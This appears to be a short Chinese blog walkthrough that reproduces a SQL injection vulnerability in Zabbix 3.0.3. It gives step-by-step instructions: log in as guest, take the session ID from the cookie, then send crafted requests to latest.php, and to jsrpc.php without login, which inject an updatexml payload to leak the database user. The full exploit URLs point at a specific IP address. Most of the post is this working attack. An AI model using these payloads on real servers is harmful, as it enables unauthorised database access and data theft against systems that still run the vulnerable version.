zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。

环境:zabbix 3.0.3:

访问http://your-ip:8080,用账号guest(密码为空)登录游客账户。

登录后,查看Cookie中的zbx_sessionid,复制后16位字符:

将这16个字符作为sid的值,访问

http://188.40.189.134:8080/latest.php?output=ajax&sid=bb74b5fcd5f62d83&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

可见成功注入:

这个漏洞也可以通过jsrpc.php触发,且无需登录

http://188.40.189.134:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

大概就这些……

说点什么
支持Markdown语法
好耶,沙发还空着ヾ(≧▽≦*)o
Loading...